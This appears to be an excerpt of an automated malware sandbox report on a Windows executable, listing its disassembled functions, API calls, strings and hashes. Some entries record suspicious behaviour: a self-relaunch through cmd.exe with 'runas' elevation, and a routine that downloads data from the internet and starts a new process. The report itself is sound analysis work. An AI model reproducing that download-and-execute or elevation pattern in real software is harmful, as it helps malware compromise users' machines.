                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 8de7ec85767217ba07f813fdb1fa3e2e2966e04cfd7429034460afb7b173811e
                                                        • Instruction ID: f92386f74bbca2c80795d6f7c1494eff8567ede3af334d2a7d0f5d846fcb7daa
                                                        • Opcode Fuzzy Hash: 8de7ec85767217ba07f813fdb1fa3e2e2966e04cfd7429034460afb7b173811e
                                                        • Instruction Fuzzy Hash: 21D1F130A0060A9FCB28EF69C584ABEB7B1FF49318F14461DD5669B795C730AE41CB5C
                                                        Function 00C8F905 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee9e197f7c891d3f5866a939c4de651cb651f544e5c7e6be523872b200a5f587
                                                        • Instruction ID: 5c9567796f7786bc255acaa319cbbb89777cd4349dedf8c21f100881ab6a8cf7
                                                        • Opcode Fuzzy Hash: ee9e197f7c891d3f5866a939c4de651cb651f544e5c7e6be523872b200a5f587
                                                        • Instruction Fuzzy Hash: 0A31C672900219AFDB24EFA9CC89EBAB76DEB84358F14416DF815D7240EA309E419B54
                                                        Function 00C84B40 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: need dictionary
                                                        • API String ID: 0-853443464
                                                        • Opcode ID: e37ab8d0f7bfb05ca2aea8b16f50c6c5db94d00a04c0ad9d5d6913e0b7f60abf
                                                        • Instruction ID: f5fb38a0c804431da27a84453e60e50dbabde66917f88703a7d102f3923d2959
                                                        • Opcode Fuzzy Hash: e37ab8d0f7bfb05ca2aea8b16f50c6c5db94d00a04c0ad9d5d6913e0b7f60abf
                                                        • Instruction Fuzzy Hash: B8C114B16006018FD774CF1AC880B22FBF4FF59315B24899ED8AACB651D776E942CB50
                                                        Function 00C87A11 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00007A1D,00C87271), ref: 00C87A16
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 6005e761c4215fab923f06eac55d1384aae4ecf9b80b8aa6af6c9436501828d6
                                                        • Instruction ID: c1351462f4af830258eee16f07dec28aa9e5c036a62865e4956b58e133c17d83
                                                        • Opcode Fuzzy Hash: 6005e761c4215fab923f06eac55d1384aae4ecf9b80b8aa6af6c9436501828d6
                                                        • Instruction Fuzzy Hash:
                                                        Function 00C82FB0 Relevance: 1.0, Instructions: 993COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbda7cf880479d6a8690b6adde060dcdb6b41233c359a17f09d265554e36ee1b
                                                        • Instruction ID: 1cc1175875ab38e71387fc6a0c5550f9f2a1c03c58d68fb70b7a29f1b747ad3a
                                                        • Opcode Fuzzy Hash: dbda7cf880479d6a8690b6adde060dcdb6b41233c359a17f09d265554e36ee1b
                                                        • Instruction Fuzzy Hash: 7292F7B5E00259DFCB04DF99C980AADBBF1FF48318F2492A9D415AB351D335AA42CF94
                                                        Function 00C83C20 Relevance: .4, Instructions: 361COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ada7e8fa614c8bf941aba92b5814df6d46338476cfc7c1c8fcbf84135213c882
                                                        • Instruction ID: 513faa365a274735bd742ace60884bcdd3c696c81114c8e22383b8c8386f8827
                                                        • Opcode Fuzzy Hash: ada7e8fa614c8bf941aba92b5814df6d46338476cfc7c1c8fcbf84135213c882
                                                        • Instruction Fuzzy Hash: A7F1F634E002698FDB24DF28C980B99B7B1FF89318F1481EAD95DA7345DB30AE858F54
                                                        Function 00C84580 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06a48d0307aba045a325c72f661d996e2a0979724963dba45942fa50020af62c
                                                        • Instruction ID: 4f9c738ede039c561b771df11e06f7e5b2ea67faa7d4d90406f36defd4ad647e
                                                        • Opcode Fuzzy Hash: 06a48d0307aba045a325c72f661d996e2a0979724963dba45942fa50020af62c
                                                        • Instruction Fuzzy Hash: A12157305240B28A870C8B3DAC26537FB91DB5720378B47BFE9D7DA0C6D52AE564D7A0
                                                        Function 00C82520 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 52memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C82534
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8253D
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00C8254A
                                                        • GetProcessHeap.KERNEL32(00000008,0000026A), ref: 00C82557
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8255A
                                                        • wsprintfW.USER32 ref: 00C82567
                                                        • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00C82587
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82593
                                                        • HeapFree.KERNEL32(00000000), ref: 00C8259C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C825A1
                                                        • HeapFree.KERNEL32(00000000), ref: 00C825A4
                                                        • ExitProcess.KERNEL32 ref: 00C825A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree$ExecuteExitFileModuleNameShellwsprintf
                                                        • String ID: /c "%s"$cmd.exe$runas
                                                        • API String ID: 3385381366-213241364
                                                        • Opcode ID: 7a681f715dbc2c23e0a673381856a14f167c9e904d0ee278fe12023dc80c8053
                                                        • Instruction ID: 742754749a1b4a1b88b388e29310723a15aa3f702653f700fa6e31b11672cc4e
                                                        • Opcode Fuzzy Hash: 7a681f715dbc2c23e0a673381856a14f167c9e904d0ee278fe12023dc80c8053
                                                        • Instruction Fuzzy Hash: 4F01FF71E803147AEB10A7A65C4EF5F7E6CFB5DB55F001055F708A71D0C9B49900DA65
                                                        Function 00C81860 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 157memoryprocessCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00C825B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                          • Part of subcall function 00C825B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                          • Part of subcall function 00C825B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                          • Part of subcall function 00C825B0: HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                          • Part of subcall function 00C825B0: RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                          • Part of subcall function 00C825B0: RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826E6
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 00C818A0
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C818A3
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 00C818B6
                                                          • Part of subcall function 00C86DD0: GetCurrentDirectoryW.KERNEL32(00000103,00000244,?,?,?,00000000,000000FF), ref: 00C86E5D
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00C81989
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8198C
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 00C819AA
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00C81A1A
                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00C81A2A
                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00C81A36
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00C81A45
                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 00C81A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Internet$CloseHandle$Alloc$FreeOpenPath$AllocateCombineCreateCurrentDirectoryFileFolderReadSpecial
                                                        • String ID: D
                                                        • API String ID: 2613224297-2746444292
                                                        • Opcode ID: 38241c9eacdde098594167fef4377c0d5e652a6f2b78735c41b311b5776d74e7
                                                        • Instruction ID: 489929afab28536fcb1726e9acddd14abe83fae4010fae2b1a38ad47f8406043
                                                        • Opcode Fuzzy Hash: 38241c9eacdde098594167fef4377c0d5e652a6f2b78735c41b311b5776d74e7
                                                        • Instruction Fuzzy Hash: D5519131A012189BDB20AF64DC5DBAE77B8FF48705F1401AEE959AB290DB309A45CF58
                                                        Function 00C88CBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • type_info::operator==.LIBVCRUNTIME ref: 00C88DDA
                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00C88EE8
                                                        • _UnwindNestedFrames.LIBCMT ref: 00C8903A
                                                        • CallUnexpected.LIBVCRUNTIME ref: 00C89055
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2751267872-393685449
                                                        • Opcode ID: dc5ed1a2a91a28ce6ca58b1ad821dfcff9d914c0cb4acb8b4ec6e06ac6e9fbc5
                                                        • Instruction ID: 7dcd94f20f229e8c58ccd2c0862a1b2ddcb183f8b53d548ad1e291d48939041c
                                                        • Opcode Fuzzy Hash: dc5ed1a2a91a28ce6ca58b1ad821dfcff9d914c0cb4acb8b4ec6e06ac6e9fbc5
                                                        • Instruction Fuzzy Hash: 73B1BD31800209EFCF15FFA4C8809AEB7B5FF14318F94415AE9116BA12DB30EE55DB99
                                                        Function 00C8E03E Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                        • Instruction ID: 6ccf269cd5f745b1ade877cbcd9be19aee200b70352ecc94059d6c116dee3b8c
                                                        • Opcode Fuzzy Hash: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                        • Instruction Fuzzy Hash: FAB17972A003659FDB11AF64CC81BBE7BA5EF56318F144165E914EB382D770DE01C7A8
                                                        Function 00C88540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88577
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00C8857F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88608
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00C88633
                                                        • _ValidateLocalCookies.LIBCMT ref: 00C88688
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: e97b15a1cb8d87377fad422e89169f55b71c53ffdbe772df19e3e1227ceedc98
                                                        • Instruction ID: acb43bb19beb8fc67f415b3c52bf219f8e4721227a0acde0a7aba590cbcfbade
                                                        • Opcode Fuzzy Hash: e97b15a1cb8d87377fad422e89169f55b71c53ffdbe772df19e3e1227ceedc98
                                                        • Instruction Fuzzy Hash: 3341D934A002189BCF10EF68C884A9EBBB5FF45318F548159F819AB792DB31DE09CB95
                                                        Function 00C911E3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,00C912F2,CA1DECC3,0000044C,00000000,00000000,?,?,00C9144C,00000022,FlsSetValue,00C9B244,00C9B24C,00000000), ref: 00C912A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3664257935-537541572
                                                        • Opcode ID: df24293b1cd3a30d3912aaeac04c3f05f2bec86c48fc10397cc2c4090aa30abe
                                                        • Instruction ID: c0278719875413571ad540086e713df8400f7ac35441684eff8edaa7b1cc1e23
                                                        • Opcode Fuzzy Hash: df24293b1cd3a30d3912aaeac04c3f05f2bec86c48fc10397cc2c4090aa30abe
                                                        • Instruction Fuzzy Hash: B121F371A01612ABDF21AB69DC4EB5E7768EB12760F280115EC22E72D0D730EE01C6E0
                                                        Function 00C88984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00C8897B,00C884E3,00C87A61), ref: 00C88992
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C889A0
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C889B9
                                                        • SetLastError.KERNEL32(00000000,00C8897B,00C884E3,00C87A61), ref: 00C88A0B
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 790ded7fd4b0881d6afd9fbf453da464caf5df6080562558215d4fa14723f256
                                                        • Instruction ID: 28c838be84f1fa6d9bc2d1fe6c2e8c01606370285a63532368603bbda6c27cb8
                                                        • Opcode Fuzzy Hash: 790ded7fd4b0881d6afd9fbf453da464caf5df6080562558215d4fa14723f256
                                                        • Instruction Fuzzy Hash: 7B01D8321183219EE62436B97C85BBE2B45FB0277C760022AF121464E1EF625C04A35D
                                                        Function 00C8D007 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA1DECC3,?,?,00000000,00C9861B,000000FF,?,00C8CFE3,00C8D0C7,?,00C8CFB7,00000000), ref: 00C8D03C
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C8D04E
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C9861B,000000FF,?,00C8CFE3,00C8D0C7,?,00C8CFB7,00000000), ref: 00C8D070
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: d29de6d4811026d3799a4632144adfc7abd214bf726b6f9563bcd85054a44e7a
                                                        • Instruction ID: 6d07f39614a871692559501f0af62350196a81ee3afd04b1f0adc4ddfe621973
                                                        • Opcode Fuzzy Hash: d29de6d4811026d3799a4632144adfc7abd214bf726b6f9563bcd85054a44e7a
                                                        • Instruction Fuzzy Hash: DD01A271904615AFDB219F58DC0DBAEBBB8FB49B14F00452AF822A26D0DB759A00CB90
                                                        Function 00C945D0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __alloca_probe_16.LIBCMT ref: 00C94655
                                                        • __alloca_probe_16.LIBCMT ref: 00C9471E
                                                        • __freea.LIBCMT ref: 00C94785
                                                          • Part of subcall function 00C8DC7F: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00C8718C,00000000,?,00C86E07,0000044C,CA1DECC3,771AF380,00000000,00000000,000000FF,?,00C814D5), ref: 00C8DCB1
                                                        • __freea.LIBCMT ref: 00C94798
                                                        • __freea.LIBCMT ref: 00C947A5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1423051803-0
                                                        • Opcode ID: eafc3c34dc5cb12c941012dec559221683e18d52709cfb88a0c7cf219c36b3df
                                                        • Instruction ID: 0626c4700beb15d422e5c5fc5c79f8323a2976dfb574370cfea13d806fced37f
                                                        • Opcode Fuzzy Hash: eafc3c34dc5cb12c941012dec559221683e18d52709cfb88a0c7cf219c36b3df
                                                        • Instruction Fuzzy Hash: C451D57260020AAFEF285FA5CC89EBB7BA9EF86714F150129FD14D7251EB30DD12D660
                                                        Function 00C89AA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C89A53,00000000,?,00CA2CE0,?,?,?,00C89BF6,00000004,InitializeCriticalSectionEx,00C99D38,InitializeCriticalSectionEx), ref: 00C89AAF
                                                        • GetLastError.KERNEL32(?,00C89A53,00000000,?,00CA2CE0,?,?,?,00C89BF6,00000004,InitializeCriticalSectionEx,00C99D38,InitializeCriticalSectionEx,00000000,?,00C899AD), ref: 00C89AB9
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C89AE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
